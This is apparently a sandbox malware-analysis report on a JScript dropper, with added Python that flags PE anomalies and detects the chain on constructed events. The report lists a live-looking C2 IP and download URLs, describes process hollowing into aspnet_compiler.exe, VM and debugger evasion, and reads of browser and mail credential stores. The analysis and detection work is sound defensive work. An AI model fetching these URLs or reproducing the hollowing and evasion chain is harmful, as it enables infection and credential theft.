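    _machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size            # section table follows the optional header
    sections = []
    for i in range(nsec):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("latin-1")
        _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        data = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "raw_size": raw_size, "entropy": shannon_entropy(data)})
    return stamp, sections


def static_flags(image, now=None):
    """The checks behind the 'Static PE information' findings above (thresholds are ours)."""
    now = time.time() if now is None else now
    stamp, sections = parse_pe(image)
    flags = []
    if stamp > now + 86400:
        flags.append("timestamp in the future")
    for s in sections:
        name = s["name"]
        if name == "":
            flags.append("nameless section")
        elif not all(ch.isalnum() or ch in "._$" for ch in name):
            flags.append(f"section name with special chars: {name!r}")
        if s["raw_size"] >= 256 and s["entropy"] > 7.0:    # packed or encrypted payload
            flags.append(f"high-entropy section {name!r}: {s['entropy']:.2f}")
    return flags


def build_sample_pe(stamp, sections):
    """Constructed minimal PE (no optional header, one raw blob per section) for offline runs."""
    nsec = len(sections)
    e_lfanew = 0x40
    data_start = (e_lfanew + 24 + 40 * nsec + 0x1FF) & ~0x1FF     # 0x200 file alignment
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, nsec, stamp, 0, 0, 0, 0x0102)
    table, blobs, ptr = b"", b"", data_start
    for name, data in sections:
        table += name.ljust(8, b"\0")[:8] + struct.pack(
            "<IIIIIIHHI", len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        ptr += len(data)
    image = dos + coff + table
    return image + b"\0" * (data_start - len(image)) + blobs


# Mimics the dropped file: a normal code section, a section named '.-L3/F' filled with
# uniformly distributed bytes (entropy exactly 8.0), and a nameless section.
SAMPLE_PE = build_sample_pe(REPORT_TIMESTAMP, [
    (b".text", b"\x90" * 512 + b"\xC3"),
    (b".-L3/F", bytes(range(256)) * 4),
    (b"", b"\0" * 64),
])

if __name__ == "__main__":
    print("AMSI buffer carries a PE image:", is_pe_image(decode_base64_prefix(AMSI_B64_PREFIX)))
    for flag in static_flags(SAMPLE_PE, now=NOW):
        print(flag)
```

On a real file, hand `open(path, "rb").read()` to `static_flags`; the entropy check is only meaningful on sections of some size, which is why the 256-byte floor is there, and a high value in `.rsrc` or `.rdata` (compressed resources, certificates) is common in clean binaries, so treat it as a prompt to look at the section, not as a verdict.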
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (91 occurrences)
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Process information set: NOOPENFILEERRORBOX (38 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process information set: NOOPENFILEERRORBOX (52 occurrences)

                    Malware Analysis System Evasion

                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLT-
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: CF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 2770000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 2590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 4D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 5D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 5E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Memory allocated: 6E50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Memory allocated: 1600000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Memory allocated: 3190000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Memory allocated: 2FD0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4055
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3156
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 | Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4344 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe TID: 2744 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe TID: 1340 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000009.00000002.1367801539.000001BED9ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: powershell.exe, 00000009.00000002.1367801539.000001BED9ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1361113372.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454137714.0000000001707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01607298 CheckRemoteDebuggerPresent,12_2_01607298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe; Network Connect: 176.65.144.3 80
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43E000
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 440000
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 11E3008
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR
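The behaviour recorded in the last two sections reduces to a handful of host-side detections: wscript.exe launching powershell.exe with -File pointing into C:\Temp, a 4D5A (MZ) header written into aspnet_compiler.exe at base 400000 from the dropped QWQWSAADAF.exe, a .NET framework binary started with no arguments by an executable in the user's Temp directory, and that same injected process opening Chrome/Edge "Login Data" and Thunderbird/Firefox profiles.ini. The Python below is an added example, not part of the Joe Sandbox report, that runs those four rules over constructed Sysmon-style events mirroring the report's observations. The event schema, the list of sibling .NET binaries beyond aspnet_compiler.exe, and the set of processes allowed to open credential stores are assumptions, not something the report states.

```python
"""Host detections for the execution chain, hollowing and credential access
described in this report. Added example; events are constructed, not real logs."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process_create", "memory_write" or "file_open" (assumed schema)
    image: str           # image path of the acting process
    parent: str = ""     # parent image (process_create)
    cmdline: str = ""    # command line (process_create)
    target: str = ""     # remote process image (memory_write) or file path (file_open)
    base: int = 0        # remote write address (memory_write)
    data: bytes = b""    # leading bytes of the write (memory_write)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Credential stores the report shows aspnet_compiler.exe opening.
CRED_STORE_SUFFIXES = ("\\login data", "\\profiles.ini")
# Processes that legitimately own those stores (assumption).
CRED_STORE_OWNERS = {"chrome.exe", "msedge.exe", "firefox.exe", "thunderbird.exe"}
# Signed .NET framework binaries used as injection targets: aspnet_compiler.exe is
# in the report, the rest are commonly abused siblings (assumption).
DOTNET_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe",
                  "msbuild.exe", "installutil.exe"}


def rule_script_host_spawns_powershell(ev: Event) -> bool:
    """wscript/cscript launching powershell.exe with -File on a script under C:\\Temp."""
    return (ev.kind == "process_create"
            and _name(ev.parent) in SCRIPT_HOSTS
            and _name(ev.image) == "powershell.exe"
            and re.search(r'-file\s+"?[a-z]:\\temp\\', ev.cmdline, re.I) is not None)


def rule_mz_written_to_foreign_process(ev: Event) -> bool:
    """A PE header (MZ / 4D5A) written into another process: process hollowing."""
    return (ev.kind == "memory_write"
            and _name(ev.image) != _name(ev.target)
            and ev.data[:2] == b"MZ")


def rule_dotnet_lolbin_hollow_target(ev: Event) -> bool:
    """.NET framework binary started with no arguments by a process in a user Temp dir."""
    return (ev.kind == "process_create"
            and _name(ev.image) in DOTNET_TARGETS
            and ev.cmdline.strip().strip('"').lower().endswith(_name(ev.image))
            and "\\appdata\\local\\temp\\" in ev.parent.lower())


def rule_credential_store_read(ev: Event) -> bool:
    """A process other than the owning browser/mail client opening a credential store."""
    return (ev.kind == "file_open"
            and ev.target.lower().endswith(CRED_STORE_SUFFIXES)
            and _name(ev.image) not in CRED_STORE_OWNERS)


RULES = (rule_script_host_spawns_powershell, rule_mz_written_to_foreign_process,
         rule_dotnet_lolbin_hollow_target, rule_credential_store_read)


def run_detections(events):
    """Return (rule name, acting image name) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, _name(ev.image)))
    return hits


# Constructed events mirroring the report's chain; not captured telemetry.
SAMPLE_EVENTS = [
    Event("process_create", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\wscript.exe",
          cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"'),
    Event("process_create", r"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe",
          parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r'"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"'),
    Event("process_create", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
          parent=r"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe",
          cmdline=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'),
    Event("memory_write", r"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe",
          target=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
          base=0x400000, data=b"MZ\x90\x00"),
    Event("file_open", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
          target=r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    # Benign control: Chrome reading its own store must not fire.
    Event("file_open", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          target=r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    for rule_name, image in run_detections(SAMPLE_EVENTS):
        print(f"{rule_name}: {image}")
```

The MZ-write rule deliberately ignores the write address: the report shows the header landing at 400000, but hollowing into a relocated image would land elsewhere, so the foreign-process plus PE-header combination is the durable signal. The .NET rule keys on the empty command line because aspnet_compiler.exe has no legitimate reason to run without arguments.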

Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: QWQWSAADAF.exe PID: 2976, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 5376, type: MEMORYSTR

MITRE ATT&CK Matrix

Leading digits in a cell are the badge counts shown in the original matrix cell.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 52 Scripting | Valid Accounts | 231 Windows Management Instrumentation | 52 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 411 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 34 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 631 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 22 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 261 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 411 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

Behavior Graph

Behavior Graph ID: 1641301; Sample: PO_111101111001.js; Start date: 18/03/2025; Architecture: WINDOWS; Score: 100
Top-level DNS/IP: ip-api.com; 212.20.149.52.in-addr.arpa; 206.23.85.13.in-addr.arpa
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

Process tree (numbers in brackets are the node badges shown on the graph):
wscript.exe [1 16]
    Network: 176.65.144.3, ports 49721, 49723, 80, PALTEL-ASPALTELAutonomousSystemPS, Germany
    Dropped: C:\Temp\WTRTRWFSHS.ps1 (ASCII)
    Signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 2 other signatures
    powershell.exe [13]
        Dropped: C:\Users\user\AppData\...\QWQWSAADAF.exe (PE32)
        Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
        conhost.exe
        QWQWSAADAF.exe [15 4]
            Dropped: C:\Users\user\AppData\Local\Temp\RUNPEE.dll (PE32)
            Signatures: Antivirus detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
            aspnet_compiler.exe [14 2]
                Network: ip-api.com 208.95.112.1, ports 49724, 80, TUT-ASUS, United States
                Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 3 other signatures

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
PO_111101111001.js | 28% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\RUNPEE.dll | 100% | Avira | HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\RUNPEE.dll | 71% | ReversingLabs | ByteCode-MSIL.Trojan.BotX

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://176.65.144.3/dev/devil.ps1 | 0% | Avira URL Cloud | safe
http://176.65.144.3/dev/DEV.exe | 0% | Avira URL Cloud | safe
http://176.65.144.3/dev/DEV.exeP | 0% | Avira URL Cloud | safe


Domains

